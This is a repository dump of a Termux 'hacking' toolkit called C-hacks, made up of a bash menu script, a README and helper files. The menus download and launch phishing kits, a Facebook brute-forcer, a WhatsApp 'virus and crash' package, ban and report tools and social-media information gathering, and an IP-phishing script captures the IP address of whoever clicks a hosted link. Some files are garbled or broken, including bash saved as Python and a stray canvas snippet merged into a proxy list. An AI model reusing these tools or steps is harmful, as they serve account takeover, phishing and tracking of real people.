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/README.md:
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1 | # C-hacks
2 | Hi am nidhin
3 | #
4 | Its a social Media gathering Tool And its have whatsapp hacks ,
5 | Fb hacks , instagram hacks , And information gathering
6 | . The main script is that I has added ip location tracking file
7 | created by MASTER-HACK And its has ip phishing extra
8 | On whatsapp hacks I has added moded whatsapp whatsapp virus extra
9 | That's it . Happy learning And don't forget to
10 | Bash my Chack.sh file . enjoy the Tool bro ..
11 | #
12 |
13 |
14 |
15 | #
16 | Its only for education purposes
17 | #
18 | Updates coming soon
19 | # Installation
20 | #
21 | ` apt update -y && apt upgrade -y `
22 |
23 | ` apt install git -y `
24 |
25 | ` git clone https://github.com/DRACULA-HACK/C-hacks `
26 |
27 | ` cd C-hacks `
28 |
29 | ` chmod +x chack.sh `
30 |
31 | ` ./chack.sh `
32 | #
33 | created by
34 | MASTER-HACK
35 | #
36 | ™𝚰𝚴𝛁𝚫𝐃𝚺𝐑𝐒 𝚯𝐅𝐂 🪁
37 | #
38 | https://wa.me//+918660264556
39 |
40 | #
41 |
42 |
43 |
44 | #
45 |
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/chack.sh:
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1 | #!/bin/bash
2 | echo -e " tool is for termux users "
3 | sleep 2
4 |
5 | echo " if you have any issues or errors contact me "
6 | sleep 5
7 |
8 |
9 |
10 | xdg-open https://wa.me//+918660264556
11 | clear
12 | pkg install pv -y
13 | pkg install figlet -y
14 | termux-setup-storage -y
15 | pkg install ruby -y
16 | gem install lolcat
17 | clear
18 |
19 | sleep 5
20 | figlet HI BRO |pv -qL 50 | lolcat
21 | echo -e " \033[1;31m By "
22 | figlet MASTER-HACK |pv -qL 50 | lolcat
23 | sleep 8
24 | clear
25 | figlet INVADERS ofc | pv -qL 50 | lolcat
26 | sleep 8
27 | clear
28 | red='\033[1;31m'
29 | rset='\033[0m'
30 | grn='\033[1;32m'
31 | ylo='\033[1;33m'
32 | blue='\033[1;34m'
33 | cyan='\033[1;36m'
34 | pink='\033[1;35m'
35 | figlet C-HACKS | pv -qL 39 | lolcat
36 | echo -e " \033[1;34mcreated by \033[1;31mMASTER\033[1;35m-\033[1;33mHACK
37 | "
38 | echo -e "
39 | $rset \033[1;31m select \033[1;36m(type the number)
40 |
41 | $rest \033[1;32m(1) whatsapp-hack
42 |
43 | \033[1;34m(2) fb hack
44 |
45 | \033[1;35m(3) insta hack
46 |
47 | \033[1;36m(4) information gathering
48 |
49 | \033[1;32m(5) paid packages
50 |
51 |
52 | "
53 |
54 | read -p " Enter Your Choice :- " choice
55 |
56 | if [ $choice = 1 ];then
57 | {
58 | clear
59 | figlet wa-hack |pv -qL 30 | lolcat
60 |
61 | echo -e "
62 |
63 | \033[1;34m (1) \033[1;32m wha bot
64 |
65 | \033[1;34m (2) \033[1;33m wha phishing
66 |
67 | \033[1;34m (3) \033[1;36mmoded wha
68 |
69 | \033[1;34m (4) \033[1;31mvirus and crash txt \033[1;34m
70 |
71 | \033[1;34m (5) \033[1;32mwhatsapp ban methods
72 |
73 | " |pv -qL 50
74 |
75 |
76 | read -p " enter your option :-" whachoice
77 |
78 | if [ $whachoice = 1 ];then
79 | sleep 4
80 | termux-open-url https://github.com/DRACULA-HACK/whatsapp-bot-md
81 |
82 | elif [ $whachoice = 2 ];then
83 | cd $home
84 | git clone https://github.com/Ignitetch/AdvPhishing
85 | cd AdvPhishing/
86 | chmod 777 *
87 | ./Android-Setup.sh
88 | ./AdvPhishing.sh
89 |
90 | elif [ $whachoice = 3 ];then
91 | termux-open-url https://www.youtube.com/c/TROKSMODS
92 | elif [ $whachoice = 4 ];then
93 | apt update
94 |
95 | apt upgrade -y
96 |
97 | termux-setup-storage -y
98 | cd $home
99 | git clone https://github.com/DRACULA-HACK/Master-virus
100 |
101 | cd Master-virus
102 |
103 | chmod +x *
104 |
105 | ./virus.sh
106 |
107 | elif [ $whachoice = 5 ];then
108 | echo " PLEASE WAIT INSTALLING THE PROGRAM FROM SERVER " | lolcat
109 | apt install pv -y >/dev/null 2>&1
110 |
111 | apt install figlet -y >/dev/null 2>&1
112 |
113 | termux-setup-storage -y >/dev/null 2>&1
114 |
115 |
116 | apt install ruby -y >/dev/null 2>&1
117 |
118 |
119 | gem install lolcat >/dev/null 2>&1
120 | echo " Den INSTALLED THE REQUIREMENT PACKAGES. LET THE PROGRAM INSTALL "| pv -qL 100 |lolcat
121 |
122 |
123 | git clone https://github.com/DRACULA-HACK/ids-inf >/dev/null 2>&1
124 |
125 | cd ids-inf >/dev/null 2>&1
126 | echo " installed " | pv -qL 100 |lolcat
127 |
128 | echo " changing directory "| pv -qL 100 |lolcat
129 | echo -e "
130 |
131 | \033[1;32m den "
132 | echo -e "
133 |
134 |
135 | INSTALLING THE PYTHON REQUIREMENTS
136 | for
137 | THE INFORMATION GATHERING Programme
138 |
139 | please wait it took time
140 |
141 | "| pv -qL 100 |lolcat
142 |
143 |
144 |
145 | python3 -m pip install -r requirements.txt >/dev/null 2>&1
146 | echo -e "
147 |
148 | ALL DEN INSTALLED ALL THE packages
149 |
150 | 😅 okay naw going to bash the start file
151 |
152 | "| pv -qL 100 |lolcat
153 |
154 | echo -e " Bourne Again SHell the file start-ids.sh
155 |
156 | "| pv -qL 100 |lolcat
157 |
158 | bash start-ids.sh
159 |
160 |
161 |
162 | fi
163 |
164 | }
165 | elif [ $choice = 2 ];then
166 | {
167 | clear
168 | figlet fb-hack | pv -qL 50 | lolcat
169 |
170 | echo " by Master-hack " | lolcat
171 |
172 | echo -e " \033[1;36m
173 |
174 | (1) fb phishing
175 |
176 | (2) fb bruteforce
177 |
178 | (3) fb inf gathering
179 |
180 | (4) fb report
181 |
182 | " | pv -qL 40 | lolcat
183 |
184 | read -p " Enter Your Choice :- " fbtool
185 |
186 | if [ $fbtool = 1 ];then
187 | cd $home
188 | git clone https://github.com/htr-tech/zphisher.git
189 |
190 | cd zphisher
191 | bash zphisher.sh
192 | elif [ $fbtool = 2 ];then
193 | cd $home
194 | git clone https://github.com/IAmBlackHacker/Facebook-BruteForce
195 | cd Facebook-BruteForce
196 | python3 -m pip install requests bs4
197 | python3 -m pip install mechanize
198 | python3 fb.py or python fb2.py
199 |
200 | elif [ $fbtool = 3 ];then
201 | apt update -y && apt upgrade -y
202 | apt install git -y
203 | apt install python2 -y
204 | git clone https://github.com/xHak9x/fbi.git
205 | cd fbi
206 | pip2 install -r requirements.txt
207 | python2 fbi.py
208 |
209 | elif [ $fbtool = 4 ];then
210 |
211 |
212 | apt install python2 -y
213 |
214 | apt install git -y
215 | cd $home
216 | git clone https://github.com/bhikandeshmukh/fbreport.git
217 |
218 | cd fbreport
219 |
220 | ls
221 |
222 | unzip Report.zip
223 |
224 | python2 Report.py
225 |
226 |
227 | fi
228 | }
229 |
230 |
231 | elif [ $choice = 3 ];then
232 | clear
233 | echo -e "
234 |
235 | \033[1;35m
236 | hi running the insta hack
237 | "
238 | sleep 3
239 |
240 |
241 | echo -e " \033[1;33m INSTALLATION " |pv -qL 40
242 | echo -e
243 |
244 |
245 | figlet INSTA-FOLLOW-BOTZ |pv -qL 50 | lolcat
246 | apt install figlet -y
247 |
248 | apt install toilet -y
249 |
250 | apt install cowsay -y
251 |
252 | apt install nano -y
253 |
254 | apt install ruby -y
255 |
256 | gem install lolcat
257 |
258 | apt install git curl openssh openssl openssl-tool -y
259 |
260 | git clone https://github.com/DRACULA-HACK/insta-follow-botz.git
261 |
262 | cd insta-follow-botz
263 |
264 | chmod +x insta4.sh
265 |
266 | ./insta4.sh
267 |
268 |
269 | elif [ $choice = 4 ];then
270 | {
271 | clear
272 | figlet INF gathering |pv -qL 50 | lolcat
273 |
274 | echo -e "
275 |
276 |
277 |
278 | (1) ip logger (url filter )
279 |
280 | (2) phone number information gathering (basic)
281 |
282 | (3) fb & insta ( information gathering )
283 |
284 | (4) ip tracker (by master-hack )
285 |
286 | (5) nmap
287 |
288 | " |pv -qL 40 | lolcat
289 |
290 | read -p " Your Choice :- " inf
291 |
292 | if [ $inf = 1 ];then
293 |
294 | termux-open-url https://iplogger.org/
295 |
296 | elif [ $inf = 2 ];then
297 | cd $home
298 | clear && echo -e '\033[1;32m[*] Download starting... MASTER-HACK' && apt update > /dev/null 2>&1 && apt --assume-yes install wget > /dev/null 2>&1 && wget https://raw.githubusercontent.com/ExpertAnonymous/PhoneInfoga/master/phoneinfoga.sh -q && clear && bash phoneinfoga.sh
299 | cd PhoneInfoga
300 | ls
301 | clear
302 | python2 -m pip install -r requirements.txt
303 | clear
304 | echo -e " Enter the target phone number
305 |
306 |
307 | " | pv -qL 40 | lolcat
308 | echo -e " \033[1;34m Type the country code with +
309 |
310 | " | pv -qL 40
311 | read -p " => " code
312 |
313 | echo -e " \033[1;36m number with out country code " | pv -qL 30
314 |
315 | read -p " numb => " number
316 | ./phoneinfoga.py -n $code$number
317 |
318 | elif [ $inf = 3 ];then
319 |
320 | {
321 | echo -e "
322 |
323 |
324 | (1) facebook information
325 |
326 | (2) instagram information
327 |
328 | " |pv -qL 30 | lolcat
329 |
330 | read -p " your option => " social
331 |
332 | if [ $social = 2 ];then
333 |
334 | figlet INSTA-FOLLOW-BOTZ |pv -qL 50 | lolcat
335 | apt install figlet -y
336 |
337 | apt install toilet -y
338 |
339 | ip install cowsay -y
340 |
341 | apt install nano -y
342 |
343 | apt install ruby -y
344 |
345 | gem install lolcat
346 |
347 | apt install git curl openssh openssl openssl-tool -y
348 |
349 | git clone https://github.com/DRACULA-HACK/insta-follow-botz.git
350 |
351 | cd insta-follow-botz
352 |
353 | chmod +x insta4.sh
354 |
355 | ./insta4.sh
356 |
357 | elif [ $social = 1 ];then
358 |
359 | apt install python2 -y
360 | git clone https://github.com/xHak9x/fbi.git
361 | cd fbi
362 | pip2 install -r requirements.txt
363 | python2 fbi.py
364 | fi
365 | }
366 |
367 | elif [ $inf = 4 ];then
368 |
369 | cd ip/file/Script/
370 |
371 | chmod +x Ip.py
372 | ./Ip.py
373 |
374 | elif [ $inf = 5 ];then
375 | pkg install nmap -y
376 | clear
377 | echo -e "
378 |
379 | "
380 | clear
381 | nmap -h
382 |
383 | echo -e "
384 |
385 | "
386 |
387 | echo -e " \033[1;34m type \033[1;31mnmap - options \033[1;34mfor to run the nmap "
388 |
389 | fi
390 | }
391 | elif [ $choice = 5 ];then
392 |
393 | unzip p.zip
394 |
395 | cd p
396 |
397 |
398 | bash .paidone.sh
399 |
400 | else
401 | echo "wrong option "
402 | bash Chack.sh
403 |
404 |
405 |
406 | fi
407 |
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/ip/Iplogger.py:
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1 | # ntha mowna edu uru chugam
2 |
3 | termux-open-url https://iplogger.org
4 |
5 | printf ("hi")
6 |
7 |
8 |
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/ip/file/Fbcodes.chacks.tryeme.ruby.zip:
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1 | Input
2 | 04379675
3 | 15668258
4 | 28092295
5 | 37823812
6 | 57920333
7 | 64240888
8 | 64584856
9 | 79919507
10 | 90721678
11 | 91623325
12 | /input!
13 | Hehe
14 | Codes for me
15 | Hacksc
16 |
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1 |
2 | var canvas = document.getElementById("myCanvas");
3 |
4 | var ctx = canvas.getContext("2d");
5 |
6 | ctx.font = "16px Arial";
7 |
8 | canvas.addEventListener("mousemove", function(e) {
9 | var cRect = canvas.getBoundingClientRect(); // Gets CSS pos, and width/height
10 | var canvasX = Math.round(e.clientX - cRect.left); // Subtract the 'left' of the canvas
11 | var canvasY = Math.round(e.clientY - cRect.top); // from the X/Y positions to make
12 | ctx.clearRect(0, 0, canvas.width, canvas.height); // (0,0) the top left of the canvas
13 | ctx.fillText("X: "+canvasX+", Y: "+canvasY, 10, 20);43.153.13.7:59394
14 |
15 | 188.0.147.102:3128
16 |
17 | 185.150.130.103:808
18 |
19 | 47.91.107.251:3080
20 |
21 | 49.0.2.242:8090
22 |
23 | 192.53.163.144:3128
24 |
25 | 20.228.221.183:8000
26 |
27 | 5.189.184.6:80
28 |
29 | 198.49.68.80:80
30 |
31 | 164.92.75.10:80
32 |
33 | 139.99.237.62:80
34 |
35 | 8.219.97.248:80
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37 | 20.111.54.16:80
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39 | 45.42.177.50:3128
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41 | 81.200.123.74:80
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43 | 20.206.106.192:8123
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51 | 165.154.226.12:80
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53 | 185.76.10.68:8081
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55 | 47.57.7.183:80
56 |
57 | 51.159.4.98:80
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59 | 35.178.238.246:80
60 |
61 | 193.122.71.184:3128
62 |
63 | 8.209.246.6:80
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65 | 124.156.9.165:59394
66 |
67 | 103.149.162.195:80
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69 | 172.104.206.170:80
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71 | 89.107.197.165:3128
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77 | 165.154.225.65:80
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80 |
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119 | 103.160.202.217:8080
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124 |
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143 | 165.154.235.76:80
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209 | 20.188.47.85:8000
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211 | 153.126.179.216:8080
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/ip/file/Script/Ip.py:
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1 | red='\033[1;31m'
2 |
3 | rset='\033[0m'
4 |
5 | grn='\033[1;32m'
6 |
7 | ylo='\033[1;33m'
8 |
9 | blue='\033[1;34m'
10 |
11 | cyan='\033[1;36m'
12 |
13 | pink='\033[1;35m'
14 |
15 | banner() {
16 |
17 | clear
18 |
19 | figlet MASTER-IP |pv -qL 100 |lolcat
20 |
21 | }
22 |
23 | menu() {
24 |
25 | echo -e $blue "
26 |
27 |
28 |
29 |
30 |
31 | (1) Your ip address
32 |
33 |
34 |
35 | (2) Ip information gathering
36 |
37 |
38 |
39 | (3) ip logger (GPS phishing)
40 |
41 |
42 | (4) ip phishing (localhost url)
43 |
44 |
45 | (0) exit
46 |
47 | "
48 |
49 | read -p "choose your option => " ip
50 |
51 | if [ $ip = 1 ]; then
52 |
53 | myipaddr
54 |
55 | elif [ $ip = 2 ]; then
56 |
57 | useripaddr
58 |
59 | elif [ $ip = 3 ]; then
60 |
61 | iplogger
62 | elif [ $ip = 4 ]; then
63 |
64 | ip_phishing
65 |
66 | elif [ $ip = 0 ]; then
67 |
68 | sleep 1
69 |
70 | echo -e " ok bye thanks for using thus script "
71 |
72 | exit 1
73 |
74 | else
75 |
76 | echo -e $red "wrong option bro ! "
77 |
78 | sleep 3
79 |
80 | banner
81 |
82 | menu
83 |
84 | fi
85 |
86 | }
87 |
88 | myipaddr() {
89 |
90 | myipaddripapico=$(curl -s "https://ipapi.co//json" -L)
91 |
92 | myipaddripapicom=$(curl -s "http://ip-api.com/json/" -L)
93 |
94 | theip=$(echo $myipaddripapico | grep -Po '(?<="ip":)[^,]*' | tr -d '[]"')
95 |
96 | thecity=$(echo $myipaddripapico | grep -Po '(?<="city":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g')
97 |
98 | theregion=$(echo $myipaddripapico | grep -Po '(?<="region":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g')
99 |
100 | thecountry=$(echo $myipaddripapico | grep -Po '(?<="country_name":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g')
101 |
102 | thelat=$(echo $myipaddripapicom | grep -Po '(?<="lat":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g')
103 |
104 | thelon=$(echo $myipaddripapicom | grep -Po '(?<="lon":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g')
105 |
106 | thetime=$(echo $myipaddripapicom | grep -Po '(?<="timezone":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g')
107 |
108 | thepostal=$(echo $myipaddripapicom | grep -Po '(?<="zip":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g')
109 |
110 | theisp=$(echo $myipaddripapico | grep -Po '(?<="org":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g')
111 |
112 | theasn=$(echo $myipaddripapico | grep -Po '(?<="asn":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g')
113 |
114 | thecountrycode=$(echo $myipaddripapico | grep -Po '(?<="country_code":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g')
115 |
116 | thecurrency=$(echo $myipaddripapico | grep -Po '(?<="currency":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g')
117 |
118 | thelanguage=$(echo $myipaddripapico | grep -Po '(?<="languages":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g')
119 |
120 | thecalling=$(echo $myipaddripapico | grep -Po '(?<="country_calling_code":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g')
121 |
122 | banner
123 |
124 | printf "\e[0m\n"
125 |
126 | printf "\e[0m\n"
127 |
128 | printf " \e[0m\e[1;93m Ip Address \e[0m\e[1;96m:\e[0m\e[1;92m $theip\e[0m\n"
129 |
130 | printf " \e[0m\e[1;93m City \e[0m\e[1;96m:\e[0m\e[1;92m $thecity\e[0m\n"
131 |
132 | printf " \e[0m\e[1;93m Region \e[0m\e[1;96m:\e[0m\e[1;92m $theregion\e[0m\n"
133 |
134 | printf " \e[0m\e[1;93m Country \e[0m\e[1;96m:\e[0m\e[1;92m $thecountry\e[0m\n"
135 |
136 | printf "\e[0m\n"
137 |
138 | printf " \e[0m\e[1;93m Latitude \e[0m\e[1;96m:\e[0m\e[1;92m $thelat\e[0m\n"
139 |
140 | printf " \e[0m\e[1;93m Longitude \e[0m\e[1;96m:\e[0m\e[1;92m $thelon\e[0m\n"
141 |
142 | printf " \e[0m\e[1;93m Time Zone \e[0m\e[1;96m:\e[0m\e[1;92m $thetime\e[0m\n"
143 |
144 | printf " \e[0m\e[1;93m Postal Code \e[0m\e[1;96m:\e[0m\e[1;92m $thepostal\e[0m\n"
145 |
146 | printf "\e[0m\n"
147 |
148 | printf " \e[0m\e[1;93m ISP \e[0m\e[1;96m:\e[0m\e[1;92m $theisp\e[0m\n"
149 |
150 | printf " \e[0m\e[1;93m ASN \e[0m\e[1;96m:\e[0m\e[1;92m $theasn\e[0m\n"
151 |
152 | printf "\e[0m\n"
153 |
154 | printf " \e[0m\e[1;93m Country Code \e[0m\e[1;96m:\e[0m\e[1;92m $thecountrycode\e[0m\n"
155 |
156 | printf " \e[0m\e[1;93m Currency \e[0m\e[1;96m:\e[0m\e[1;92m $thecurrency\e[0m\n"
157 |
158 | printf " \e[0m\e[1;93m Languages \e[0m\e[1;96m:\e[0m\e[1;92m $thelanguage\e[0m\n"
159 |
160 | printf " \e[0m\e[1;93m Calling Code \e[0m\e[1;96m:\e[0m\e[1;92m $thecalling\e[0m\n"
161 |
162 | printf "\e[0m\n"
163 |
164 | printf " \e[0m\e[1;93m location in google map \e[0m\e[1;96m:\e[0m\e[1;94m https://maps.google.com/?q=$mylat,$thelon\e[0m\n"
165 |
166 | sleep 5
167 |
168 | printf "\e[0m\n"
169 |
170 | printf " \e[0m\e[1;91m[\e[0m\e[1;97m01\e[0m\e[1;91m]\e[0m\e[1;93m Return To Main Menu\e[0m\n"
171 |
172 | printf " \e[0m\e[1;91m[\e[0m\e[1;97m02\e[0m\e[1;91m]\e[0m\e[1;93m Exit\e[0m\n"
173 |
174 | printf "\e[0m\n"
175 |
176 | read -p $' \e[1;31m>>\e[0m\e[1;96m \en' mainorexit1
177 |
178 | if [[ $mainorexit1 == 1 || $mainorexit1 == 01 ]]; then
179 |
180 | banner
181 |
182 | menu
183 |
184 | elif [[ $mainorexit1 == 2 || $mainorexit1 == 02 ]]; then
185 |
186 | printf "\e[0m\n"
187 |
188 | printf "\e[0m\n"
189 |
190 | exit 1
191 |
192 | else
193 |
194 | printf " \e[1;91m[\e[0m\e[1;97m!\e[0m\e[1;91m]\e[0m\e[1;93m Invalid option \e[1;91m[\e[0m\e[1;97m!\e[0m\e[1;91m]\e[0m\n"
195 |
196 | sleep 1
197 |
198 | banner
199 |
200 | menu
201 |
202 | fi
203 |
204 | }
205 |
206 | useripaddr() {
207 |
208 | banner
209 |
210 | printf "\e[0m\n"
211 |
212 | printf "\e[0m\n"
213 |
214 | printf "\e[0m\n"
215 |
216 | read -p $' \e[1;31m[\e[0m\e[1;37m~\e[0m\e[1;31m]\e[0m\e[1;92m Input IP Address \e[0m\e[1;96m: \e[0m\e[1;93m\en' useripaddress
217 |
218 | ipaddripapico=$(curl -s "https://ipapi.co/$useripaddress/json" -L)
219 |
220 | ipaddripapicom=$(curl -s "http://ip-api.com/json/$useripaddress" -L)
221 |
222 | userip=$(echo $ipaddripapico | grep -Po '(?<="ip":)[^,]*' | tr -d '[]"')
223 |
224 | usercity=$(echo $ipaddripapico | grep -Po '(?<="city":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g')
225 |
226 | useregion=$(echo $ipaddripapico | grep -Po '(?<="region":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g')
227 |
228 | usercountry=$(echo $ipaddripapico | grep -Po '(?<="country_name":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g')
229 |
230 | userlat=$(echo $ipaddripapicom | grep -Po '(?<="lat":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g')
231 |
232 | userlon=$(echo $ipaddripapicom | grep -Po '(?<="lon":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g')
233 |
234 | usertime=$(echo $ipaddripapicom | grep -Po '(?<="timezone":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g')
235 |
236 | userpostal=$(echo $ipaddripapicom | grep -Po '(?<="zip":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g')
237 |
238 | userisp=$(echo $ipaddripapico | grep -Po '(?<="org":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g')
239 |
240 | userasn=$(echo $ipaddripapico | grep -Po '(?<="asn":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g')
241 |
242 | usercountrycode=$(echo $ipaddripapico | grep -Po '(?<="country_code":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g')
243 |
244 | usercurrency=$(echo $ipaddripapico | grep -Po '(?<="currency":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g')
245 |
246 | userlanguage=$(echo $ipaddripapico | grep -Po '(?<="languages":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g')
247 |
248 | usercalling=$(echo $ipaddripapico | grep -Po '(?<="country_calling_code":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g')
249 |
250 | banner
251 |
252 | printf "\e[0m\n"
253 |
254 | printf "\e[0m\n"
255 |
256 | printf " \e[0m\e[1;93m Ip Address \e[0m\e[1;96m:\e[0m\e[1;92m $userip\e[0m\n"
257 |
258 | printf " \e[0m\e[1;93m City \e[0m\e[1;96m:\e[0m\e[1;92m $usercity\e[0m\n"
259 |
260 | printf " \e[0m\e[1;93m Region \e[0m\e[1;96m:\e[0m\e[1;92m $useregion\e[0m\n"
261 |
262 | printf " \e[0m\e[1;93m Country \e[0m\e[1;96m:\e[0m\e[1;92m $usercountry\e[0m\n"
263 |
264 | printf "\e[0m\n"
265 |
266 | printf " \e[0m\e[1;93m Latitude \e[0m\e[1;96m:\e[0m\e[1;92m $userlat\e[0m\n"
267 |
268 | printf " \e[0m\e[1;93m Longitude \e[0m\e[1;96m:\e[0m\e[1;92m $userlon\e[0m\n"
269 |
270 | printf " \e[0m\e[1;93m Time Zone \e[0m\e[1;96m:\e[0m\e[1;92m $usertime\e[0m\n"
271 |
272 | printf " \e[0m\e[1;93m Postal Code \e[0m\e[1;96m:\e[0m\e[1;92m $userpostal\e[0m\n"
273 |
274 | printf "\e[0m\n"
275 |
276 | printf " \e[0m\e[1;93m ISP \e[0m\e[1;96m:\e[0m\e[1;92m $userisp\e[0m\n"
277 |
278 | printf " \e[0m\e[1;93m ASN \e[0m\e[1;96m:\e[0m\e[1;92m $userasn\e[0m\n"
279 |
280 | printf "\e[0m\n"
281 |
282 | printf " \e[0m\e[1;93m Country Code \e[0m\e[1;96m:\e[0m\e[1;92m $usercountrycode\e[0m\n"
283 |
284 | printf " \e[0m\e[1;93m Currency \e[0m\e[1;96m:\e[0m\e[1;92m $usercurrency\e[0m\n"
285 |
286 | printf " \e[0m\e[1;93m Languages \e[0m\e[1;96m:\e[0m\e[1;92m $userlanguage\e[0m\n"
287 |
288 | printf " \e[0m\e[1;93m Calling Code \e[0m\e[1;96m:\e[0m\e[1;92m $usercalling\e[0m\n"
289 |
290 | printf "\e[0m\n"
291 |
292 | printf " \e[0m\e[1;93m GOOGLE Maps \e[0m\e[1;96m:\e[0m\e[1;94m https://maps.google.com/?q=$userlat,$userlon\e[0m\n"
293 |
294 | sleep 5
295 |
296 | printf "\e[0m\n"
297 |
298 | printf " \e[0m\e[1;91m[\e[0m\e[1;97m01\e[0m\e[1;91m]\e[0m\e[1;93m Return To Main Menu\e[0m\n"
299 |
300 | printf " \e[0m\e[1;91m[\e[0m\e[1;97m02\e[0m\e[1;91m]\e[0m\e[1;93m Exit\e[0m\n"
301 |
302 | printf "\e[0m\n"
303 |
304 | read -p $' \e[1;31m>>\e[0m\e[1;96m \en' mainorexit2
305 |
306 | if [[ $mainorexit2 == 1 || $mainorexit2 == 01 ]]; then
307 |
308 | banner
309 |
310 | menu
311 |
312 | elif [[ $mainorexit2 == 2 || $mainorexit2 == 02 ]]; then
313 |
314 | printf "\e[0m\n"
315 |
316 | printf "\e[0m\n"
317 |
318 | exit 1
319 |
320 | else
321 |
322 | printf " \e[1;91m[\e[0m\e[1;97m!\e[0m\e[1;91m]\e[0m\e[1;93m Invalid option \e[1;91m[\e[0m\e[1;97m!\e[0m\e[1;91m]\e[0m\n"
323 |
324 | sleep 1
325 |
326 | banner
327 |
328 | menu
329 |
330 | fi
331 |
332 | }
333 |
334 | iplogger() {
335 |
336 |
337 |
338 | termux-open-url https://iplogger.org/
339 |
340 | mainorexit1
341 |
342 | if [[ $mainorexit1 == 1 || $mainorexit1 == 01 ]]; then
343 |
344 | banner
345 |
346 | menu
347 |
348 | elif [[ $mainorexit1 == 2 || $mainorexit1 == 02 ]]; then
349 |
350 | printf "\e[0m\n"
351 |
352 | printf "\e[0m\n"
353 |
354 | exit 1
355 |
356 | else
357 |
358 | printf " \e[1;91m[\e[0m\e[1;97m!\e[0m\e[1;91m]\e[0m\e[1;93m Invalid option \e[1;91m[\e[0m\e[1;97m!\e[0m\e[1;91m]\e[0m\n"
359 |
360 | sleep 1
361 |
362 | banner
363 |
364 | menu
365 |
366 | fi
367 |
368 | }
369 |
370 | ip_phishing() {
371 |
372 | bash iplocalmasterphish.py
373 | }
374 | banner
375 |
376 | menu
377 |
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/ip/file/Script/iplocalmasterphish.py:
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1 | intro() {
2 | clear
3 | echo ""
4 | echo -e "
5 |
6 | by "
7 |
8 | figlet MASTER-HACK |lolcat
9 |
10 | figlet IP-PHISHING
11 |
12 | echo -e "\e[92m"
13 | echo
14 | echo -e "[1] IP PHISHING "
15 | echo
16 | echo -e "[2] BACK TO MAIN MENU"
17 | echo
18 | read -p "ENTER AN OPTION : " option
19 | if [ $option = 1 ];
20 | then
21 | main
22 | elif [ $option = 2 ];
23 | then
24 | cd
25 | fi
26 | }
27 |
28 | main () {
29 | clear
30 | echo ""
31 | echo -e "
32 |
33 |
34 | by "
35 |
36 | figlet MASTER-HACK |lolcat
37 | figlet IP-PHISHING
38 | echo ""
39 | echo ""
40 | echo -e "\e[31m hi I am nidhin
41 | "
42 | echo -e "\e[92m"
43 | read -p "ENTER A PORT : " port
44 | php -S 127.0.0.1:$port > /dev/null 2>&1 &
45 | sleep 1.7
46 | echo
47 | echo -e "\e[31m[•] \e[33m CONNECT WITH NGROK \e[31m[•]"
48 | echo
49 | echo -e "\e[31m[°] \e[36mSERVER HOSTED AT : \e[92m127.0.0.1:$port"
50 | echo
51 | echo -e "\e[0m--------------------------------"
52 | echo -e "\e[31m[~] \e[33mWAIT FOR TARGET CLICK \e[31m[~]\e[0m"
53 | echo -e "--------------------------------"
54 |
55 | echo
56 |
57 |
58 | rm -rf ip.txt
59 |
60 | while true;
61 | do
62 | if [ -e ip.txt ];
63 | then
64 | echo
65 | ip5=$(cat ip.txt | grep IP: | awk '{print $2}')
66 | echo -e "\e[31m[!] \e[95mIP FOUND : \e[92m$ip5"
67 | rm -rf ip.txt
68 | fi
69 | done
70 |
71 | }
72 |
73 | intro
74 |
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/p.zip:
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/update.sh:
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1 | #!/bin/bash
2 |
3 | echo -e " updating " |lolcat
4 | echo ""
5 | echo ""
6 | cd $home
7 | echo " please wait " | pv -qL 50| lolcat
8 | echo ""
9 | echo ""
10 |
11 |
12 | rm -rf C-hacks
13 |
14 | git clone https://github.com/DRACULA-HACK/C-hacks
15 | clear
16 | cd C-hacks
17 |
18 | chmod +x Chack.sh
19 |
20 | ./Chack.sh
21 |
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